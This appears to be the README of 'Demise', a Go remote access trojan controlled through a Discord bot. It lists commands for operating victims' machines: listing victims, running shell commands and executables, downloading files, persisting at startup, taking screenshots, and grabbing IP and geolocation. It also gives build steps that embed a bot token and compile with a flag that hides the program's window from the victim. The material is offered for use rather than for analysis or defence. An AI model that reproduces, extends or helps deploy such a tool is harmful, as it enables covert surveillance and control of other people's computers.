Demise is Golang malware that uses Discord for communication.
-
show victims connected
$victims -
extract a zip file
$unzip <username> <.zip file on drive> <directory to extract in> -
run Demise on startup
$startup <username> -
run an executable (some executables require admin)
$run <username> <location of exe> -
download file
$dl <username> <url> <name of file> -
run commands
$shell <username> <command> <flags... optional> -
screenshot desktop
$ss <username> -
get IP
$ip <username> -
kill session
$kill <username> -
geolocate
$geoloc <username>
- Download the source code
- Download golang https://go.dev choose the correct install for your os
- make a server (this is a discord bot RAT)
- make a bot. I won't show you how because there are many tutorial on youtube https://www.youtube.com/watch?v=7A-bnPlxj4k&t=20s
- add the bot to your server and make a new text channel in your server
- copy your bot's token and the id of the text channel you just created
- put the channel id here at the beginning of the source code
- put your bot's token here
- compile with a command similiar to this one
go build -ldflags="-s -w -H=windowsgui" .-H=windowsguiwill hide the window
if the bot doesn't respond to commands change your intents